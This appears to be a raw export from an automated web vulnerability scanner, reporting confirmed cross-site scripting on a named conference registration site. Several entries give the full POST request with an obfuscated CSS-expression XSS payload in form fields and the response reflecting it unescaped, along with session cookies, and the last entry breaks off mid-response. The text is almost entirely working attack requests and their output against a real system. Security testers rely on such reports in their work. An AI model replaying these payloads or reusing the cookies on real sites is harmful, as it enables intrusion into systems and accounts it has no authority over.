reference POST 3
eb POST 3
admin POST -1
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=55d479aca34f47c4bb830a42235f48ce
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1550
Accept-Encoding: gzip, deflate

--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="action"

preload_category
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="eventid"

19301
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="categoryid"

-1
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="language"

eng
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="reference"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="eb"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="admin"

-1
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="discountcode"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65419]"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65420]"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65413]"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65411]"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65421]"

3
--55d479aca34f47c4bb830a42235f48ce
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--55d479aca34f47c4bb830a42235f48ce--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:51:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3408
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=8812292d60a8449db193404d1cb82da6
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1550
Accept-Encoding: gzip, deflate

--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="action"

preload_category
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="eventid"

19301
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="categoryid"

-1
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="language"

eng
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="reference"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="eb"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="admin"

-1
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="bridgeid"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65419]"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65420]"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65413]"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65411]"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65421]"

3
--8812292d60a8449db193404d1cb82da6
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--8812292d60a8449db193404d1cb82da6--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:52:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3410
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=402dac9dabc84f52a6d2b3440cefc828
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1550
Accept-Encoding: gzip, deflate

--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="action"

preload_category
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="eventid"

19301
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="categoryid"

-1
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="language"

eng
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="reference"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="eb"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="admin"

-1
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="bridgeid"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="discountcode"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65419]"

" stYle="x:expre/**/ssion(netsparker(9))
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65420]"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65413]"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65411]"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65421]"

3
--402dac9dabc84f52a6d2b3440cefc828
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--402dac9dabc84f52a6d2b3440cefc828--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:52:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
